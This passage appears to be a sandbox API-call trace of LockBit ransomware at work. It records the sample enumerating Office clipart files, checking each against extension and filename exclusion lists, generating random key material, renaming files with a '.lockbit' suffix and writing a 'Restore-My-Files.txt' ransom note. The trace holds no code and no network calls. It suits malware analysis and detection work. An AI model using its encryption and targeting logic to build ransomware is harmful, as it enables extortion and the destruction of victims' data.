param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0237225.WMF.lockbit") returned 72 [0153.308] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0237225.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0237225.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0153.310] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.310] malloc (_Size=0x40068) returned 0x3df0008 [0153.310] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=52128) returned 1 [0153.310] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.310] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.310] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0153.311] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.311] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0153.311] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.316] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0237225.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0237225.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.316] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.316] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0153.319] free (_Block=0x1fa2ed8) [0153.319] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0237225.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.319] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.319] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.319] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24625400, ftCreationTime.dwHighDateTime=0x1be8fbc, ftLastAccessTime.dwLowDateTime=0x565f5550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x24625400, ftLastWriteTime.dwHighDateTime=0x1be8fbc, nFileSizeHigh=0x0, nFileSizeLow=0x5700, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0237228.WMF", cAlternateFileName="")) returned 1 [0153.319] lstrcmpiW (lpString1=".", lpString2="J0237228.WMF") returned -1 [0153.319] lstrcmpiW (lpString1="..", lpString2="J0237228.WMF") returned -1 [0153.319] PathFindExtensionW (pszPath="J0237228.WMF") returned=".WMF" [0153.319] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.319] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.319] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.319] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.319] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.319] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.319] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.319] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.320] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.320] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.320] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.320] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.320] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.320] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.320] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.320] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.320] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.320] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.320] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.320] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.320] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.320] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.320] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.320] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.320] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.320] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.320] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.320] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.320] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.320] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.320] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.320] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.321] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.321] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.321] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.321] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.321] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.321] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.321] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.321] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.321] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.321] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.321] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.321] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.321] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.321] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.321] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.321] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0237228.WMF") returned 1 [0153.321] lstrcmpiW (lpString1="ntldr", lpString2="J0237228.WMF") returned 1 [0153.321] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0237228.WMF") returned 1 [0153.321] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0237228.WMF") returned -1 [0153.321] lstrcmpiW (lpString1="autorun.inf", lpString2="J0237228.WMF") returned -1 [0153.321] lstrcmpiW (lpString1="thumbs.db", lpString2="J0237228.WMF") returned 1 [0153.321] lstrcmpiW (lpString1="iconcache.db", lpString2="J0237228.WMF") returned -1 [0153.321] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.321] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0237228.WMF") returned=".WMF" [0153.321] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.321] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.322] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.322] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.322] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.322] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.322] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.322] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.322] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.322] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.322] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.322] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.322] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.322] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.322] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.322] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.322] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.322] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.322] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.322] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.322] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.322] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.322] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.322] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.322] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.323] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.323] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.323] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.323] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0237228.WMF.lockbit") returned 72 [0153.323] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0237228.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0237228.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0153.324] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.324] malloc (_Size=0x40068) returned 0x3df0008 [0153.324] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=22272) returned 1 [0153.324] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.325] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.325] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0153.325] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.325] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.325] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0153.325] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.331] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0237228.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0237228.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.331] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.332] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0153.332] free (_Block=0x1fa2ed8) [0153.332] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0237228.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.332] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.332] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.332] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x660a4230, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x60c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0237336.WMF", cAlternateFileName="")) returned 1 [0153.332] lstrcmpiW (lpString1=".", lpString2="J0237336.WMF") returned -1 [0153.332] lstrcmpiW (lpString1="..", lpString2="J0237336.WMF") returned -1 [0153.332] PathFindExtensionW (pszPath="J0237336.WMF") returned=".WMF" [0153.333] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.333] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.333] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.333] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.333] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.333] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.333] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.333] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.333] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.333] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.333] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.333] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.333] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.333] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.333] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.333] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.333] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.333] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.333] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.333] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.333] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.333] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.333] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.334] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.334] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.334] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.334] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.334] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.334] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.334] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.334] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.334] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.334] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.334] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.334] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.334] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.334] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.334] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.334] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.334] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.334] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.334] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.334] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.334] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.334] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.334] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.334] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.334] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0237336.WMF") returned 1 [0153.334] lstrcmpiW (lpString1="ntldr", lpString2="J0237336.WMF") returned 1 [0153.335] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0237336.WMF") returned 1 [0153.335] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0237336.WMF") returned -1 [0153.335] lstrcmpiW (lpString1="autorun.inf", lpString2="J0237336.WMF") returned -1 [0153.335] lstrcmpiW (lpString1="thumbs.db", lpString2="J0237336.WMF") returned 1 [0153.335] lstrcmpiW (lpString1="iconcache.db", lpString2="J0237336.WMF") returned -1 [0153.335] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.335] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0237336.WMF") returned=".WMF" [0153.335] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.335] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.335] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.335] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.335] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.335] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.335] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.335] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.335] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.335] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.335] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.335] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.335] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.335] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.335] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.335] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.335] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.335] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.336] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.336] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.336] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.336] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.336] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.336] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.336] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.336] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.336] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.336] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.336] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0237336.WMF.lockbit") returned 72 [0153.336] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0237336.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0237336.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0153.337] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.337] malloc (_Size=0x40068) returned 0x3df0008 [0153.337] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=24770) returned 1 [0153.337] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.338] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0153.338] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.338] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0153.339] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.344] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0237336.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0237336.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.344] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.344] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0153.347] free (_Block=0x1fa2ed8) [0153.347] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0237336.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.347] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.347] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.347] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x660ca390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x51be, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0237759.WMF", cAlternateFileName="")) returned 1 [0153.347] lstrcmpiW (lpString1=".", lpString2="J0237759.WMF") returned -1 [0153.347] lstrcmpiW (lpString1="..", lpString2="J0237759.WMF") returned -1 [0153.347] PathFindExtensionW (pszPath="J0237759.WMF") returned=".WMF" [0153.347] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.347] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.347] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.347] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.347] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.347] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.347] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.348] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.348] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.348] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.348] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.348] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.348] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.348] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.348] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.348] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.348] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.348] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.348] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.348] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.348] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.348] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.348] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.348] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.348] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.348] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.348] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.348] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.348] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.348] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.348] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.348] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.348] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.349] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.349] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.349] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 